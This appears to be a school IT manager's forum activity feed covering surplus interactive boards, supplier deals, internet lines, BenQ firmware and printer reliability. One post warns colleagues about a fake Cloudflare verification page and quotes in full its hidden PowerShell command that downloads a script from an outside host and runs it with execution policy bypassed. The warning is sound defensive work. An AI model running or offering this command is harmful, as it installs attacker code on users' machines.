denzal2k4 replied to denzal2k4's topic in Classified Adverts
Off to the WEEE they go then! Seems a waste! -
We will have available 2 x 86" Prowise boards in good working condition available plus 4 x 65" ProWise boards also in good condition all come with the OPS modules which I believe are 8th/ 10th gen i5's with 240GB SSD. Collection from Tonbridge, these are big heavy boys! Will be available hopefully before the end of July.

We recently signed up for Lenovo Pro, and our contact is Sean: [email protected] (SMB account manager) he has been very useful and signing up was pretty easy, don't remember having to explicitly say we are a school. We got a quote on the site which immediately had 5% off I went back to him and he knocked some more money off, they also do tiered rewards I think its if you spend £5k in a year you get either 8 or 12% off everything over that. HTH

But we are talking low 5 figures I guess?

Care to share how much money it is likely to cost? It does look interesting.

Just for comparison purposes, we are with Orbtalk, 10 inbound channels, 19 Direct dial numbers, £120 pm, not had any issues in the past 3ish years. Web interface is easy to add more numbers or channels as and when needed.

Simple batch file: md C:\staffStart\programs copy /Y .\programs\* C:\staffStart\programs\ Within the intunewin file is a folder called programs containing a load of shortcuts. To add or remove shortcut just plop them in the shortcuts folder and create the package again.

Care to share a price, so I don't need to go down the sales rabbit hole just to find it's overpriced. Ta!

Just to say after seeing this thread, we had a demo with EdTechPro, the reception staff love it, easy to setup and great support, we have now signed up for it. They can see instantly who is calling and have all the pupil details pulled up in front of them, also the absence line AI feature is great, transcribes the messages with the option to click a button and add it as an absence. We use iSAMS

Freeze function issue Benq RE7504A Only

Just to say big thanks to BenQ, the new frmware for the 65" is working nicely and includes a request we made to blank passwords as they were being entered which was a real concern for us. so thanks for listening! -
Which ISP/ Speed / Redundancy do you have?
denzal2k4 replied to denzal2k4's topic in Internet Related/Filtering/Firewall
Lots of interesting feedback, thanks, yes this is purely a 1Gb internet line, we have onsite Smoothwall, @mthomas08 be interested to hear what products you have for that price. We don't necessarily NEED more than 1Gb now but if we are entering a 3 year deal it may be worth future proofing, we are fully Sharepoint for file storage, iSAMS is cloud, we have cloud backups, so it does get pushed at times. Does anyone know how much of ballache it is to get things like 3cx to switch over seamlessly via Smoothwall in event of an outage on the main line? Assuming the secondary line has different IP addresses. Thanks for the thorough post Lee, we may be in touch soon. -
Hi everyone, I’m currently reviewing our internet setup and wanted to get some advice. We’d ideally like to increase our speed, but since we’re already on a 1Gb bearer this would involve putting in a 10Gb line (cost?), I’m wondering if it would be better to add another 1Gb line for redundancy instead of just trying to boost bandwidth. I’d be interested to hear what setups you’re all using and roughly how many devices/users you’re supporting. For reference, here’s our current situation: Connection: BT, 1Gb/1Gb, £600/month no redundancy Staff: 150 Pupils: 500 User Devices: ~350 Thanks in advance!

Freeze function issue Benq RE7504A Only
denzal2k4 replied to sarge's topic in AV and Multimedia Related
We have a separate freeze issue, whereby it doesn't freeze but it says it has, this is when using any method, Instashare from Windows, Android, HDMI connection, USBC. It says frozen but happily carries on showing what is happening behind. Support have said what I expect is the same update will hopefully fix it. We are using RP6504 / RP7504. -
I know this is becoming popular, our staff have started trying to use it today and its taking them to a fake cloudflare verification page, asking them to copy and paste code into the run command, I'd advice blocking sphinxai.education just in case someone tries running it, the command it wants you to run is: powershell -w h -nop -c "$qyc='https://adapadske.org/zfg.lim';$poy=\"$env:USERPROFILE\Documents\kfphp.ps1\";$qey=New-Object Net.WebClient;$qey.DownloadFile($qyc,$poy);powershell -w h -ep bypass -f $poy" Smells fishy to me! I have alerted them and am awaiting a response. Hope this helps!

We have another 10 of these up for grabs, various conditions, velcor marks etc some have smallish screen blemishes, most come with the PC modules (i3, i5) which have been wiped will need to be collected ASAP!

Google's reCAPTCHA issues

We are seeing the same, any updates on a resolution? -
I appreciate your response Synkrox. Can you clarify I'm looking at the online catalogue and it has one for example that says IM C8000 80ppm A3 Colour booklet, that would include the additional finisher unit? The picture doesn't show one is the only reason I ask. Many Thanks
-
How did you get on with the install? With the CCS framework did you still have a named person to contact with regards to getting the right finishers, etc? I assume staples toner etc all gets ordered automajically and along with service calls is covered by the cost per print? Ta

A car vs money scenario... Please help me make up my mind!

Can I throw a curveball in, for around what you would pay for the Dacia you could get this https://www.motor4u.com/vehicle-details/used-tesla-model-3-standard-range-plus-saloon-4dr-electric-auto-rwd-241-bhp-saloon-automatic-electric-for-sale-in-sussex-u10314/ Tesla Model 3, 80k on the clock, I believe they come with 8 year/ 120k Battery and motor warranty. Maybe Tesla is a dubious option in the current climate but you can also get similar Polestars for the same kind of budget, people have to remember high mileage is different for electric cars, no cambelt, head gaskets etc to worry about, its a motor and a battery. Another less pretty option whcih I curreently drive and have 4 years and 50k miles under the belt and no issues, MG5 you can grab a 2021 10k miles for £13,000, or the mg4 smaller option, great car, everyone has them written off as cheap and chinese, which they are but the quality and reliability is excellent. Second hand prices for electric make them worth a second look. -
Very helpful, I shall have a look, if you go via the framework do you still get an account manager to help spec out what machines are most appropriate before purchasing or is it down to you?
-
Wow great feedback guys, Ricoh is the one to pursue then, luckily they cold emailed me the other day, will follow up, thanks!

I feel like we have Sharp out at least once a week to fix an issue and we only have a dozen printers, wondering if any of these other brands have better reliability, maybe some of it is staff misuse but we have also had 2 with powerboard failures this year and they are only 3 years old.
-
Very useful thanks, I did forget to add that we do use print release via NFC cards using Papercut and scan to Onedrive is useful so would be a shame to lose those features
